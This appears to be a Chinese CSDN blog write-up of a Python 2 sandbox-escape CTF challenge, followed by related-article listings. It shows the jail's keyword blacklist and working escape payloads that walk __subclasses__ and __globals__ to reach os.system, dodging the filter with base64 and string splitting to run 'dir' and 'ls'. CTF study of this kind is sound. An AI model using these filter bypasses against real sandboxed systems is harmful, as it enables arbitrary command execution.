python 重定向 ctf_CTF python沙箱逃逸进阶题目

最新推荐文章于 2022-09-29 15:17:40 发布
最新推荐文章于 2022-09-29 15:17:40 发布
阅读量292 收藏
点赞数
文章标签: python 重定向 ctf

future引用了python3的新特性,所以是不能直接回回显,得用print

file函数可以读取。

print(().__class__.__bases__[0].__subclasses__()[40]('./sx2.py').read())

读取源码后:

from __future__ import print_function

banned = [

"import",

"exec",

"eval",

"pickle",

"os",

"subprocess",

"kevin sucks",

"input",

"banned",

"cry sum more",

"sys"

]

targets = __builtins__.__dict__.keys()

targets.remove('raw_input')

targets.remove('print')

for x in targets:

del __builtins__.__dict__[x]

while 1:

print(">>>", end=' ')

data = raw_input()

for no in banned:

if no.lower() in data.lower():

print("No bueno")

break

else: # this means nobreak

exec data

没有ban reload函数,所以思路就是

reload(__builtins__) 可没想到不知道为啥不行。然后想别的办法。

只禁用了builtins里的函数,那我们找

payload

print("".__class__.__mro__[2].__subclasses__()[72].__init__.__globals__['os']).system('dir')(windows下,我的linux下是71)。

可发现还是不行,原因是不仅仅把builtins里面的危险函数禁用了,还有关键字符一起禁用了(在最后的一个小的if判断里面)

于是想到'os'变为'b3M='.decode('base64')

最终的payload

print("".__class__.__mro__[2].__subclasses__()[72].__init__.__globals__['b3M='.decode('base64')]).system('dir')

另外从别人那里偷来一句:

print(().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls'))

weixin_39578674
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-rootme 题解之 Python - PyJail 1
weixin_30276935的博客
03-15 1983
Link:https://www.root-me.org/en/Challenges/App-Script/Python-PyJail-1 Reference:https://docs.python.org/2/library/inspect.html?highlight=func_code Solution: [ BlackArch ~ ]# ssh -p 2222 app-scrip...
python 重定向 ctf_CTF-rootme 题解之Python - pickle
weixin_33740713的博客
01-28 480
Read a pickled object hierarchy from a bytes object and return the reconstituted object hierarchy specified therein.The protocol version of the pickle is detected automatically, so no protocol argumen...
ctf php沙箱,从一个CTF题目学习Python沙箱逃逸
weixin_33225892的博客
03-16 576
作为一个CTF爱好者,又是一个Bin选手,在国外各种受虐的同时,总是能学到不少的东西。最近,和师傅们在做国外的CTF题,做到一种Pwn题目,是需要选手在Python沙箱达到逃逸的目的,获取flag。在谷歌的过程中,找到了一篇不错的博文。正文注意:这是为Python 2.7.3编写的。这些细节可能在其他版本的Python - 特别是Python3 - 有所不同!尝试逃离沙箱总是一个有趣的挑战。Py...
BugkuCTF-Crypto题python_jail
am_03的博客
08-27 886
题目可通过nc远程连接 输入nc建立连接 测试发现最多只能输入10个字符,要想有输出,需要print() (7个字符) 若print(flag)则有11个字符,超出限制,报错 可利用python里help()函数,借报错信息带出flag变量值内容,help(flag) 刚好10个字符 ...
BugKu_python_jail
Kobalos的博客
08-24 783
看到提示了nc 114.67.246.176 13828 在终端连接nc 这时候看到了描述中的提示,flag在flag变量里面! 尝试打印flag变量 发现他报错了,再尝试下任意打印一个字符串试一下 任意输入的字符a被成功打印,猜测应该是对输入的长度进行限制 打印“aa”又报错了,猜测输入的字符长度应该被限制在10以内 这时候想到help函数,借助报错信息应该可以带出flag 成功得到flag! ...
python 重定向 ctf_CTF web题型解题技巧 第四课 web总结
weixin_39615984的博客
12-10 732
以下内容大多是我在学习过程中,借鉴前人经验总结而来,部分来源于网络,我只是在前人的基础上,对CET WEB进行一个总结;----------------------------------------------------------------------------------------------------------------------工具集:基础工具:Burpsuite,pyt...
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
Python沙箱逃逸总结
forbidd3n,keep going
07-26 2016
0x00 简介 关于Python沙箱逃逸,在多次CTF比赛中看到后,终于下定决心来进行一番学习和总结。 python沙箱逃逸:从一个受限制的python执行环境中获取到更高的权限,甚至getshell。 0x01 __builtins__ 首先我们从python的内建函数__builtins__说起。通过dir(__builtins__)可以查看内置函数,展示所有内置类型和函数。 ...
CTF_Bot_Discord:使用Python和Golang的CTF Bot
04-09
**CTF_Bot_Discord: Python与Golang在网络安全竞赛中的应用** CTFCapture The Flag)是一种流行的信息安全竞赛形式,参赛者通过解决各种技术挑战来展示他们的网络安全技能。CTF_Bot_Discord项目是专门为这种比赛...
CTFHUB-HTTP-HTTP临时重定向
qq_53755216的博客
01-22 2656
文章目录前言一、题目:解决重定向问题二、解题步骤1.了解重定向是啥?2.思考:总结 前言 一、题目:解决重定向问题 二、解题步骤 1.了解重定向是啥? 301和302状态码都表示重定向,就是说浏览器在拿到服务器返回的这个状态码后会自动跳转到一个新的URL地址,这个地址可以从响应的Location首部中获取(用户看到的效果就是他输入的地址A瞬间变成了另一个地址B) 301表示旧地址A的资源已经被永久地移除了(这个资源不可访问了),搜索引擎在抓取新内容的同时也将旧的网址交换为重定向之后的网址; 302表示旧地
bugku crypto-python_jail
weixin_46578840的博客
08-22 629
启动场景后得到nc ip+端口号 连上之后发现print flag会报错 而且经过测试只能传入10个字符多了就会报错 那就不能用print 利用python中help()函数,借报错信息带出flag变量值内容, 刚好10个字符
CTF python沙箱逃逸进阶题目
weixin_30432579的博客
01-12 574
future引用了python3的新特性,所以是不能直接回回显,得用print file函数可以读取。 print(().__class__.__bases__[0].__subclasses__()[40]('./sx2.py').read()) 读取源码后: from __future__ import print_function banned = [ "import", ...
CTF—逆向入门题目(超详细)
热门推荐
CharlesGodX的博客
09-13 7万+
0x00:介绍 以下为一些简单的Windows逆向入门题目,帮助一些刚接触逆向又无法下手的朋友,如果对安卓逆向感兴趣的朋友可以看一下我的这一篇安卓逆向入门题目哦:https://blog.csdn.net/CharlesGodX/article/details/86602958 0x01:题目 1.Bugkuctf平台中的逆向题easy_vb: 打开文件发现需要输入注册码获取flag ...
渗透学习-CTF篇-web-ctfhub
qq_43696276的博客
09-29 1693
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的题来唤醒自己的记忆!!
python 重定向 ctf_CTF常用python代码
weixin_39902508的博客
12-10 517
参加个CTF比赛,发现自己零代码量,什么东西都没有准备,被吊打当然正常,基本的工具常用的代码可以自己提前写好的呀常用的代码有:gcd:求两个数的最大公约数egcd:求满足ax+by=1,当gcd(a,b)=1时,满足式子的x和yhextoflag:很多题目都是给的字母的ord值:两位两位表示一个字母,转化成chr字符就是flag的b64:base64解密b32:base32解密qp:quickpo...
ctf python大法好_247CTF的9个web题目分析
weixin_39558317的博客
02-23 1260
最近朋友推荐几个web题目,都是这个平台的,感觉有些题目还不错,web有十个,有一个要用机器学习识别验证码,就没搞,就写了九个,还是学到了一些骚思路的,还是太菜了HELICOPTER ADMINISTRATORS——Hard考点从XSS入手,利用SSRF去访问后端的一个有SQLite注入的查询服务XSS=>SSRF=>SQLite注入描述This applications admini...
CTF MISC在我眼里各种奇奇怪怪的题学习思路总结(持续更新)
超大青花鱼的博客
09-18 842
这一篇主要记录我遇到的我以前没见过也没想过的题,总之奇奇怪怪的知识又增加了。
CTFPython考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 4001
ctf题型分类: 1.CTFPython—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
轩禹ctf_rsa工具用法
10-16
轩禹ctf_rsa工具是一款用于RSA加密解密的工具,使用方法如下: 1. 生成RSA密钥对 使用命令 `python3 ctf_rsa.py genkey` 可以生成一对RSA密钥,公钥和私钥会保存在当前目录下的 `public.pem` 和 `private.pem` 文件中。 2. RSA加密 使用命令 `python3 ctf_rsa.py encrypt -k public.pem -i plaintext.txt -o ciphertext.txt` 可以使用公钥对明文进行加密,加密后的密文会保存在 `ciphertext.txt` 文件中。 3. RSA解密 使用命令 `python3 ctf_rsa.py decrypt -k private.pem -i ciphertext.txt -o plaintext.txt` 可以使用私钥对密文进行解密,解密后的明文会保存在 `plaintext.txt` 文件中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值